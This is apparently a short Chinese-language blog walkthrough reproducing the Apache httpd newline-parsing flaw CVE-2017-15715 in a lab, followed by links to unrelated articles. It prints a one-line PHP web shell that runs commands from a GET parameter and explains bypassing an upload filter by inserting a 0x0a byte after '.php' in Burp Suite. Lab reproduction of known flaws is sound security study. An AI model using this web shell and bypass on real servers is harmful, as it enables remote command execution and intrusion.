Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
llilian_169 分钟前
时间同步校时服务器配件清单及挑选攻略 校时时间服务器 网络时间同步装置
运维·服务器·网络
DeepVis Research12 分钟前
【BCI/Consensus】2026年度脑机接口协同与分布式共识机制基准索引 (Benchmark Index)
人工智能·网络安全·数据集·脑机接口·分布式系统
nvd1115 分钟前
通过 Gmail API 发送邮件的完整指南
服务器·网络
深圳市恒讯科技17 分钟前
防止服务器被黑:终极防范网络攻击指南
运维·服务器·网络安全
IT观测20 分钟前
选择可信数据空间安全服务商:源堡科技以风险管控能力破局
大数据·科技·安全
duration~25 分钟前
ARP 协议详情
网络·网络协议·tcp/ip·智能路由器
2503_9469718633 分钟前
【P2P/Blockchain】2026年度去中心化P2P协议与不可变智能合约审计基准索引 (Benchmark Index)
网络安全·区块链·数据集·架构设计·分布式系统
zbtlink35 分钟前
常见的家用路由器耗电量高吗?不同产品耗电量会不会有差别
网络·智能路由器
渡我白衣44 分钟前
Reactor与多Reactor设计:epoll实战
linux·网络·人工智能·网络协议·tcp/ip·信息与通信·linux网络编程
灋✘逞_兇1 小时前
Protobuf的RPC序列化和调用原理
网络·网络协议·rpc